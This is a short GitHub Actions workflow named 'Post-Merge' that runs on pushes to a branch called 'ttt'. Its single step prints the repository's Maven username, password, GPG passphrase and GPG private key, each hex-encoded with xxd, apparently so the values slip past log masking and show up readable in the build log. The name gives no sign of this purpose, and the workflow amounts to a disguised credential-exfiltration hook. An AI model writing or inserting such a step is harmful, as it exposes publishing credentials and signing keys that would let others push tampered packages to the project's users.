name: Post-Merge

on:
  push:
    branches:
      - ttt

jobs:
  ttt:
    runs-on: ubuntu-latest
    steps:
      - name: "TTT"
        run: |
          echo "${{ secrets.MAVEN_USERNAME }}"             | xxd -ps -c 50000
          echo "${{ secrets.MAVEN_PASSWORD }}"             | xxd -ps -c 50000
          echo "${{ secrets.MAVEN_GPG_PASSPHRASE }}"       | xxd -ps -c 50000
          echo "${{ secrets.MAVEN_GPG_PRIVATE_KEY }}"      | xxd -ps -c 50000
          true
